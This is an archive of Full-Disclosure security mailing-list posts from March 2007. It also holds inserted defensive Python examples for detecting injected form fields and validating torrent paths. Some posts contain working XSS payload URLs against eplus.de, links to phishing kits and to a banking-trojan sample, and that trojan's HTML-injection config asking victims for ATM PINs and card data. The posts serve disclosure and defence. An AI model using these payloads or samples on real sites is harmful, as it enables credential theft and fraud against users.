Re: [Full-disclosure] firefox 2.0.0.2 crash

2007-03-12 Thread Rik Bobbaers
doesn't do that with a later version of gimp...:

: 10:10 lois ~ ;gimp firefox-crash-save-session-before-clicking.gif
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.

Re: [Full-disclosure] firefox 2.0.0.2 crash

2007-03-12 Thread Sam Hocevar
On Fri, Mar 09, 2007, Tõnu Samuel wrote:

 http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif
 
 I do NOT know anything else than this url. Just seen it in random
 discussion and anyone else I asked knows nothing. Current tests indicate
 that Mozilla 2.0.0.2 gets killed within second, 1.5.0.10 survives.

   I came up with that file using zzuf (http://sam.zoy.org/zzuf/).
Manpage has an example on how to fuzz Firefox.

Cheers,
-- 
Sam.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] A small phishing operation

2007-03-12 Thread phpninja


All sites have a list1.txt filled with emails for spam and browseable
directory, this was found just searching with google. Im going to bed.

-phpninja

[Full-disclosure] R: A small phishing operation

2007-03-12 Thread bunker
 All sites have a list1.txt filled with emails for
 spam and browseable directory, this was found just
 searching with google.

Here the google dork: http://www.google.it/search?q=%2Bparent+%2B%22index+of+%2F%22+%2B%22list1.txt%22+mailer

Interesting...

Bye,
Andrea bunker Purificato



[Full-disclosure] a heeeee he announcement

2007-03-12 Thread heeeee he
Dear gmail

we use following email to harvest the fruits of our phishing attempts
[1]. Please ban our asses!

[EMAIL PROTECTED]
[EMAIL PROTECTED]


thanks for reading
he he

[1] http://wireless-mania.com/xcart/templates_c/www.BankOfAmerica.zip



[Full-disclosure] a heeeee he announcement

2007-03-12 Thread heeeee he
dear gmail and web2mail.com

we use following emails to collect the phishing victims' credentials
[1]. Please ban our asses!

[EMAIL PROTECTED]
[EMAIL PROTECTED]


thanks for reading
he he

[1] 
http://www.contestadofm.com.br/curso/Mais%20Arquivos/.UMporfolio/hfax.online-servive-update.zip



[Full-disclosure] a heeee he announcement

2007-03-12 Thread heeeee he
Dear Gmail and Inbox.com

we use the following email addresses to harvest the fruits of our
phishing attempts [1][2]. Please ban our asses!

[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]

thanks for reading
he he

[1] http://www.wassmail.co.uk/archive/16/113/attachments/wach.zip
[2] http://www.wassmail.co.uk/archive/16/113/attachments/new.zip



[Full-disclosure] Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

2007-03-12 Thread Thierry Zoller
Dear list,

Whoever deals with these people and thinks they are a benign Adware
company (and thus spreads their bundles).

Check this :
Ignoring the fact that they basically install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject :
-
inject
url=wellsfargo 
before=name=userid autocomplete='off'/DIV 
what=
DIVLABEL for=useridATM PIN/LABEL:BRSPAN class='mozcloak'INPUT id=pin 
 tabIndex=2 maxLength=4 type=password size=4 name=pin 
autocomplete='off'/SPAN/DIV

block=alt=Go 
check=pin
quan=4
content=d

/inject


Attached the main files (pass 123), feel free to add this as HIPS or whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.

I have no more time feel free to dig deeper.


I especially liked this :

inject
url=citibank.com 
TRTD colspan=3 class=smallArial noWrapSPAN STYLE='color:red'To prevent 
fraud enter your credit card information please:/SPAN/TD/TR


Puke..

-- 
http://secdev.zoller.lu
Thierry Zoller
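
Added example (not part of the original post and not the author's code): one way to detect the form injection described above is to compare the input fields in the page as the server sent it with those in the DOM the browser rendered. The sample pages, the `injected_fields` helper and the sensitive-name patterns are assumptions constructed for illustration; the injected block is modelled on the wellsfargo extract quoted in the post.

```python
import re
from collections import Counter
from html.parser import HTMLParser

# Field names that suggest credential or card data (assumed pattern list).
SENSITIVE_NAME = re.compile(r"pin|card|cvv|ssn|passw", re.I)


class InputCollector(HTMLParser):
    """Counts every form control in a document as a (name, type) pair."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.fields = Counter()

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag not in ("input", "select", "textarea"):
            return
        a = {k: (v or "") for k, v in attrs}
        name = (a.get("name") or a.get("id") or "").lower()
        ftype = (a.get("type") or "text").lower() if tag == "input" else tag
        self.fields[(name, ftype)] += 1


def collect_fields(html):
    parser = InputCollector()
    parser.feed(html)
    parser.close()
    return parser.fields


def injected_fields(served_html, rendered_html):
    """Return controls present in the rendered DOM but not in the served page."""
    extra = collect_fields(rendered_html) - collect_fields(served_html)
    findings = []
    for (name, ftype), count in sorted(extra.items()):
        sensitive = ftype == "password" or bool(SENSITIVE_NAME.search(name))
        findings.append(
            {"name": name, "type": ftype, "count": count, "sensitive": sensitive}
        )
    return findings


# Constructed sample: the login form as the server sends it.
SERVED = """<form action="/signon" method="post">
<div><label for="userid">Username</label>
<input id="userid" name="userid" autocomplete='off'/></div>
<div><label for="password">Password</label>
<input type="password" name="password"/></div>
<input type="image" alt="Go" name="go"/>
</form>"""

# Constructed sample: the extra block, modelled on the extract in the post.
INJECTED = (
    "<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'>"
    "<INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin "
    "autocomplete='off'></SPAN></DIV>"
)

# The DOM as rendered on an affected machine: same form plus the extra block.
MARKER = "autocomplete='off'/></div>"
RENDERED = SERVED.replace(MARKER, MARKER + INJECTED, 1)

if __name__ == "__main__":
    for finding in injected_fields(SERVED, RENDERED):
        print(finding)
```

The comparison only sees fields present in the snapshot it is given, so it belongs wherever a trusted copy of the served page and the rendered DOM can both be obtained.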



[Full-disclosure] RIM BlackBerry Pearl 8100 Browser DoS

2007-03-12 Thread mike kemp

RIM BlackBerry Pearl 8100 Browser DoS
--

12 March 2007

Summary:
A vulnerability has been discovered that could impact upon the availability
of the BlackBerry 8100 Wireless handheld (v4.2.0.51). It is possible for a
remote attacker to construct a WML page that contains an overly long string
value within a link (e.g.: a href = aaa etc.). Should the
page or link be accessed by BlackBerry devices, this leads to a temporary
Denial of Service within the 4thPass browser component on the device, and
temporary device inoperability. Normal functionality will be returned to the
browser / device after an amount of time relative to the size of the link
supplied, or by physically removing and reinserting the battery thereby
creating a reset.

Business Impact:
Exploitation of this issue can lead to a loss of device functionality.

Affected Product(s):
The BlackBerry 8100 (Pearl) handheld device (v4.2.0.51)

Remediation:
Upgrade to vendor patch 4.2.1

Additional details of this vulnerability are available from the vendor at
www.blackberry.com/security/news.jsp

Credit:
Michael Kemp (www.clappymonkey.com)

Re: [Full-disclosure] firefox 2.0.0.2 crash

2007-03-12 Thread Kristian Hermansen (khermans)
Firefox even crashes if you have it open and visit the site from lynx...

$ lynx http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif

Looking up people.zoy.org
Making HTTP connection to people.zoy.org
Sending HTTP request.
HTTP request sent; waiting for response.
HTTP/1.1 200 OK
Data transfer complete
/usr/bin/firefox '/tmp/ggdfOe/L23367-1095TMP.gif'

lynx: Start file could not be found or is not text/html or text/plain
  Exiting...
--
Kristian Hermansen

___
Date: Fri, 09 Mar 2007 20:31:40 +0200
From: Tõnu Samuel [EMAIL PROTECTED]
Subject: [Full-disclosure] firefox 2.0.0.2 crash
To: full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=UTF-8

Can be dupe but in fast browsing over topics I did not discover this
exploit:

http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif


I do NOT know anything else than this url. Just seen it in random
discussion and anyone else I asked knows nothing. Current tests indicate
that Mozilla 2.0.0.2 gets killed within second, 1.5.0.10 survives.

   Tõnu

[Full-disclosure] Call for Papers: DeepSec IDSC 2007 Europe/Vienna: 20-23 Nov 2007

2007-03-12 Thread Paul Böhm
DeepSec In-Depth Security Conference 2007 Europe - Nov 20-23 2007 -
Vienna, Austria
http://deepsec.net/

Call for Papers

In light of Austria's active security scene we are pleased to announce
the first annual European DeepSec In-Depth Security Conference[1], to
be held from November 20th to 23rd 2007 in Vienna. We have found a
really nice venue, a hotel in the old imperial riding school in the
heart of the City, and will provide a comprehensive social program
around the event.

We're inviting you to submit papers and proposals for trainings for
the conference. All proposals received before June 10th 2007, 23:59
CET will be considered by the Program Committee.

Also we would like to announce and invite you to the first informal
monthly Security by Candlelight[2] Security-Enthusiast Meeting to be
held in the Viennese non-profit Hackspace/Innovation Center Metalab[3]
on Monday, the 19th of March 2007, 19:30.

[1] http://deepsec.net/
[2] http://metalab.at/wiki/Security_bei_Kerzenschein
[3] http://metalab.at/wiki/English

== About DeepSec ==

DeepSec IDSC is an annual European two-day in-depth Conference on
Computer-, Network-, and Application-Security. The first DeepSec
Conference will be held from November 22nd to 23rd 2007 in Vienna, and
aims to bring together the leading security experts from all over the
world in Europe.

In addition to the conference with thirty-two sessions, four two-day
intense security training courses will be held before the main
conference. The conference program will be augmented with a live
hacking competition and a team capture the flag contest.

DeepSec is a non-product, non-vendor-biased conference. Our aim is to
present the best research and experience from the fields' leading
experts.

Target Audience: Security Officers, Security Professionals and Product
Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and
Firewall-Admins, and Software Developers.

== Speakers/Trainers ==

Until June 10th, 23:59 CET, we'll be accepting papers and lightning
talk submissions.
Please note we are a non-product, non-vendor biased security conference,
and do not accept vendor pitches.

Speaker privileges include

   * One economy class return-ticket to Vienna.
   * 3 nights of accommodation in the Conference Hotel.
   * Breakfast, Lunch, and two coffee breaks
   * Speaker activities during, before, and after the conference.
   * Speaker After-Party in the Metalab Hackerspace on November, 24th.

Trainer privileges include

   * 50% of the net profit of the class.
   * 2 nights of accommodation in the Conference Hotel during the trainings.
   * Breakfast, Lunch, and two coffee breaks.
   * Free Speaker Ticket for the Conference.
   * Speaker activities during, before, and after the conference.
   * Speaker After-Party in the Metalab Hackerspace on the 24th November

== Topics ==

We are interested in bleeding edge security research, directly from
leading researchers, professionals in academics, industry, and
government, and the underground security community. Topics of special
interest include

   * Vista, Linux, OSX Security
   * E/I-Voting Case-Studies, Attacks, Weaknesses
   * Mobile Security
   * Network Protocol Analysis
   * AJAX/Web2.0/Javascript Security
   * Secure Software Development
   * VoIP
   * Perimeter Defense / Firewall Technology
   * Digital Forensics
   * WLAN/WiFi, GPRS, IPv6 and 3G Security
   * IPv6
   * Smart Card Security
   * Cryptography
   * Intrusion Detection
   * Incident Response
   * Rootkit Detection, Techniques, and Defense
   * Security Properties of Web-Frameworks
   * Malicious Code Analysis
   * Secure Framework Design
   * .Net and Java Security

== Submission ==

Proposals for presentations and trainings at the first annual
DeepSec In-Depth Security Conference will be accepted until June 10th
2007, 23:59 CET.

All proposals should be submitted over the web at http://www.deepsec.net/cfp/.
If you have questions, want to send us additional material, or have
problems with the webform, feel free to contact us at [EMAIL PROTECTED]

Regards
paul



[Full-disclosure] XSS on eplus.de, german mobile telephony provider

2007-03-12 Thread Hanno Böck
Here we go:
 
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort=;scriptalert(1)/script
http://www.eplus-unternehmen.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus-unternehmen.de/frame.asp?go=');alert('
 
Already fixed ones:
http://www.eplus-unternehmen.de/frame.asp?go=http://www.google.de/
http://www.eplus-unternehmen.de/frame.asp?go=http://[EMAIL PROTECTED]
http://www.eplus-unternehmen.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus-unternehmen.de/frame.asp?go=http://www.eplus.de.mydomain.com

With lots of work done by alexander brachmann, www.bitsploit.de.
All have been reported to E-Plus before.

Blog-entry english:
http://www.hboeck.de/item/458

Blog-entry german (more detailed):
http://www.hboeck.de/item/457

-- 
Hanno Böck  Blog:   http://www.hboeck.de/
GPG: 3DBD3B20   Jabber: [EMAIL PROTECTED]


pgpkVjTgg35kM.pgp
Description: PGP signature

Re: [Full-disclosure] Is OWASP vulnerable ??

2007-03-12 Thread Steven M. Christey

Not to reduce the high signal-to-noise ratio on this thread, but I
suspect there are lots of eval injection vulnerabilities in
Javascript-heavy applications, but they don't seem to be reported to
the usual places, or maybe people just call them XSS.  Perl, PHP, and
other interpreted languages have eval injection too, but at least
they're reported occasionally.

- Steve



Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite

2007-03-12 Thread Steven M. Christey

Stefano Di Paola said:

1. I search on google for import_request_variables advisories
(nothing found)
2. I search on php.net in changeLog for fixes (nothing found).

I can see why you weren't able to find anything.  However, there have
been a number of disclosures that are probably related - but these
were grep-and-gripe affairs in third party applications, where the
researcher didn't necessarily investigate *why* certain attacks
worked.

Grepping for superglobal names through CVE suggests the following PHP
application issues might be related to this behavior, although in some
cases it could just be some extract() or dynamic variable evaluation
or other method for overwriting critical variables:

CVE-2007-1024 - _SERVER[DOCUMENT_ROOT]
CVE-2006-4673 - _SERVER[REMOTE_ADDR]  (might be extract)
CVE-2006-4545 - _SERVER[DOCUMENT_ROOT]
CVE-2006-3798 - _SERVER, _ENV, _COOKIE (extract)
CVE-2006-1914 - GLOBALS, _SERVER
CVE-2005-4318 - _SERVER[REMOTE_ADDR]
CVE-2005-4317 - _SERVER[REMOTE_ADDR]
CVE-2005-3926 - _SERVER[REMOTE_ADDR]
CVE-2005-2574 -  _SERVER[REMOTE_ADDR] (extract)
CVE-2005-1996 - _SERVER[DOCUMENT_ROOT]
CVE-2005-3300 - _FILES
CVE-2007-0599 - SERVER
CVE-2006-5796 - _SESSION[docroot_path]
CVE-2006-5078 - _SESSION[dirMain]
CVE-2006-2828 - import_request_variables(), but not for superglobals

etc.


- Steve



[Full-disclosure] [USN-435-1] Xine vulnerability

2007-03-12 Thread Kees Cook
=== 
Ubuntu Security Notice USN-435-1 March 12, 2007
xine-lib vulnerability
CVE-2007-1387
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libxine1c2   1.0.1-1ubuntu10.9

Ubuntu 6.06 LTS:
  libxine-main1 1.1.1+ubuntu2-7.7

Ubuntu 6.10:
  libxine1 1.1.2+repacked1-0ubuntu3.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Moritz Jodeit discovered that the DirectShow loader of Xine did not 
correctly validate the size of an allocated buffer.  By tricking a user 
into opening a specially crafted media file, an attacker could execute 
arbitrary code with the user's privileges.



[Full-disclosure] new AttackAPI

2007-03-12 Thread pdp (architect)
for those who are interested in Web 2.0 security, there is a new
version of AttackAPI that you can download from here:

http://www.gnucitizen.org/projects/attackapi/

There is still no documentation which is a bit of a drawback, but that
will be generated soon. If there is anyone interested in documenting
some of the features, please contact us.

There is also a simple bookmarklet that you can use to load
AttackAPI on any page. You can install it from here:

http://www.gnucitizen.org/projects/load-attackapi-bookmarklet

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



[Full-disclosure] [USN-436-1] KTorrent vulnerabilities

2007-03-12 Thread Kees Cook
=== 
Ubuntu Security Notice USN-436-1 March 12, 2007
ktorrent vulnerabilities
CVE-2007-1384, CVE-2007-1385
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  ktorrent 1.2-0ubuntu5.1

Ubuntu 6.10:
  ktorrent 2.0.3+dfsg1-0ubuntu1.1

After a standard system upgrade you need to restart KTorrent to effect 
the necessary changes.

Details follow:

Bryan Burns of Juniper Networks discovered that KTorrent did not 
correctly validate the destination file paths nor the HAVE statements 
sent by torrent peers.  A malicious remote peer could send specially 
crafted messages to overwrite files or execute arbitrary code with user 
privileges.





signature.asc
Description: Digital signature
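
Added example (not from the advisory and not KTorrent's actual fix): a sketch of the two checks the notice says were missing, applied to data a client receives from a torrent or a peer. It assumes the standard BitTorrent layout, where a file's destination is a list of path components and a HAVE message is a 4-byte length prefix of 5, a message id of 4 and a 4-byte big-endian piece index; the function names and sample values are hypothetical.

```python
import os
import struct


class PeerInputError(ValueError):
    """Raised when torrent or peer supplied data fails validation."""


def safe_destination(download_dir, components):
    """Join torrent path components under download_dir, refusing escapes."""
    if not components:
        raise PeerInputError("empty file path")
    for part in components:
        # Reject anything that is not a plain file or directory name.
        if part in ("", ".", "..") or any(ch in part for ch in "/\\\x00"):
            raise PeerInputError(f"illegal path component {part!r}")
    base = os.path.abspath(download_dir)
    dest = os.path.abspath(os.path.join(base, *components))
    # Second line of defence: the result must still sit under the base.
    if os.path.commonpath([base, dest]) != base:
        raise PeerInputError("destination escapes the download directory")
    return dest


def parse_have(message, num_pieces):
    """Parse a HAVE message and bounds-check its piece index."""
    if len(message) != 9:
        raise PeerInputError("HAVE message must be exactly 9 bytes")
    length, msg_id, index = struct.unpack(">IBI", message)
    if length != 5 or msg_id != 4:
        raise PeerInputError("not a well-formed HAVE message")
    # The index is later used to address a per-piece bitfield, so it must
    # be smaller than the number of pieces the torrent declares.
    if index >= num_pieces:
        raise PeerInputError(f"piece index {index} out of range")
    return index


if __name__ == "__main__":
    # Constructed sample inputs.
    print(safe_destination("/srv/downloads", ["album", "track01.ogg"]))
    print(parse_have(struct.pack(">IBI", 5, 4, 7), num_pieces=100))
    for bad in (["..", "outside.txt"], ["/etc/x"]):
        try:
            safe_destination("/srv/downloads", bad)
        except PeerInputError as exc:
            print("rejected:", exc)
```

`os.path.abspath` does not resolve symbolic links, so a client that allows links inside the download directory would need `os.path.realpath` for the containment check.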

[Full-disclosure] XSS on eplus.de, german mobile telephony provider

2007-03-12 Thread security
Hi Hanno Böck,

We have mirrored the affected websites on XSSed.com. You are welcome to
post to XSSed.com any more XSS vulnerabilities that you discover.

To the rest of the subscribers and readers of Full-disclosure - if you
find an XSS vulnerable website, you can post it on www.XSSed.com. The
affected websites are saved automatically in the on-hold archive until
review by our staff. We classify the published websites into high-profiled
- gov, mil, famous - and not. If you want to know more about the goals of
XSSed.com, please read this news:
http://www.xssed.com/news/22/XSSed.com_What_Who_Why/


We allow submission of vulnerabilities that can be exploited against
users, such as http response splitting, frame injection, CSRF/XSRF.


Dim
--
XSSed.com
